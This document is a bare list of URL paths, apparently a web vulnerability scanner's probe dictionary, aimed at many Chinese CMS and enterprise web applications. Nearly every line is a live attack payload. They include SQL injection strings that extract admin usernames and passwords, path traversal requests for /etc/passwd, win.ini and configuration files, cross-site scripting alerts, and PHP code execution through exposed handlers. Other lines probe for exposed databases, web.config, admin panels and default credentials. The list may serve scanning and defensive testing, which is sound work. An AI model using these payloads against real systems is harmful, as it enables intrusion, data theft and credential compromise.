/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/SH_Data/SH_DataBase.mdb
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/Search.asp
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/SecondPages/infodetail.aspx?InfoId=-9631'%20UNION%20ALL%20SELECT%20NULL,CHAR%28113%29%2bCHAR%28112%29%2bCHAR%28113%29%2bCHAR%28115%29%2bCHAR%2881%29%2bCHAR%2858%29%2bCHAR%28109%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28119%29%2bCHAR%28109%29%2bCHAR%28113%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Server/CmxGuide.php?pgid=Guide_List
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/SysAdmin/
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/SystemAdmin/
/SystemManage/
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/WEB-INF/
/WEB-INF/database.properties
/WEB-INF/web.xml
/WS/WebService.asmx
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Web.config
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/WebService/
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/WorkFlow/wf_get_fields_approve.aspx?template_id=(select%20char(99)%2bchar(87))
/WorkFlow/wf_office_file_history_show.aspx?id=1'%20and%20(select%20char(81)%2bchar(87))%3E0%20--
/WorkFlow/wf_work_form_save.aspx?office_missive_id=(select%20char(99)%2bchar(77))
/WorkFlow/wf_work_print.aspx?idlist=(select%20char(98)%2bchar(67))
/WorkFlow/wf_work_stat_setting.aspx?template_id=(select%20char(99)%2bchar(67))
/WorkPlan/plan_template_preview.aspx?template_id=(select%20char(99)%2bchar(65))
/_database/_database.mdb
/_database/e3b3ee1b5da271ai.mdb
/_database/qiye_free.asp
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut/author.dll
/_vti_bin/shtml.exe?_vti_rpc
/_vti_cnf/
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/about/?module=../robots.txt&fmodule=7
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/acc/clsf/filters/editProtocolFilter.php?protoNum=xxx%22%20union%20select%20111,'webscan','md5(0x7765627363616e)',3%20from%20USERINFO--
/acc/vpn/download.php?f=../../../../../etc/passwd
/account.t?op=showAccountList
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/admin.asp
/admin.aspx
/admin.cfg
/admin.jsp
/admin.php
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/admin.php?c=js&f=index&ext=../config.php
/admin.php?mod=db&act=login
/admin/
/admin/Admin_Config.asp
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/admin/Role/Role_List.aspx
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/admin/admin.asp
/admin/admin.aspx
/admin/admin.jsp
/admin/admin.php
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/admin/admin_adminmodifypwd.aspx
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/admin/admin_database.aspx
/admin/admin_login.asp
/admin/admin_login.aspx
/admin/admin_login.jsp
/admin/admin_login.php
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/admin/backup.aspx
/admin/cs/login.jsp
/admin/do/proxy.php?method=get&target=http://class.omeeting.cn:80/push/35004/div_push_0/index.html&method=get&target=../../../../../../../../../../windows/win.ini
/admin/editor/db/ewebeditor.mdb
/admin/fileopen.asp?filename=../index.asp
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/htmledit/db/ewebeditor.mdb
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/admin/index.asp
/admin/index.jsp
/admin/index.php
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/admin/login.asp
/admin/login.aspx
/admin/login.jsp
/admin/login.php
/admin/login/login.php
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/login_sys.asp
/admin/manage.jsp
/admin/manageAPP.php
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/picupload.aspx
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/admin/sysadmin_view.asp
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/xiugai_zw.asp?id=-1%20union%20select%201,chr(106),3,4,5,chr(97)%26chr(58),7,8,9,10,chr(109),12,13%20from%20admin
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/admin_aspcms/index.asp
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?infloat=yes&handlekey=123);alert(/webscan/);//
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/administrator/
/adminpage/
/ajax.aspx?type=GetAreaIDByName&AreaName=1'%20and%20char(106)%3E0--
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?action=dig&module=members+where+1%3d1+and+(select+1+from+(select+count(*)%2cconcat((select+concat(0x3a%2cmd5(1122)%2c0x3a)+from+boka_members+where+uid%3d1)%2cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/ajax.php?infloat=yes&handlekey=123);alert(/webscan/);//
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/ajax/execphpcode.php?DontCheckLogin=1&phpCodeType=0&phpCode=exit(md5(webscan));
/ajax/getemaildata.php?DontCheckLogin=1&filePath=../../../tsvr/turbocrm.ini
/ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=1'and%201=2%20union%20select%20top%201%20NULL,NULL,NULL,NULL,chr(97)%2bchr(58)%2bchr(99),NULL,chr(99)%2bchr(58)%2bchr(97)from%20admin%16
/ajax_check.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?user_edit_account=-1%22%20union%20select%20md5%280x045154%29%23
/ajax_check.php/login.php/login.php?ippoolID=-1%22%20UNION%20SELECT%201,2,3,md5(0x045154),5,6%23
/ajax_check.php/login.php/login.php?order_check_account=-1'%20union%20select%201,2,md5(0x045154)%23
/ajax_check.php/login.php/login.php?productID1=-1'%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/announcement.php?infloat=yes&handlekey=123);alert(/webscan/);//
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/api.php?act=1&appname=../../core/html/pages/about.html%00
/api.php?action=File&ctrl=download&path=api.php
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..%5C..%5C..%5Cphpsso_server%5Ccaches%5Ccaches_admin%5Ccaches_data%5Capplist&path=admin
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/apps/include.php?file=index.php
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/article/file/?method=out&file=../../../../application/config/config.ini.php
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/ask/search_ajax.php?q=s%bb%27
/asord/asord_searchresult.php?type=02')%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(98)%7C%7CCHR(109)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7CCHR(107)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(113)%7C%7CCHR(76)%7C%7CCHR(89)%7C%7CCHR(76)%7C%7CCHR(113)%7C%7CCHR(103)%7C%7CCHR(116)%7C%7CCHR(100)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&q=312321
/aspnet/
/attachment.php?infloat=yes&handlekey=123);alert(/webscan/);//
/avcon/av_downavstream/streamoforg/selectd.php?get=11234
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/backup/
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/basket.asp?h%77_id=513%20and%201=2
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/biz.php?ctl=user&act=register&step=4&sid=1%20and%200%20union%20select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,md5(1122),27,28
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/bom.php?dir=.
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/boot/phpConfig/tb_admin.txt
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/browse/browse_user_db.php
/bugfree/install/index.php?action=upgraded
/bulletin/bulletin_template_show.aspx?id=(select%20char(86))
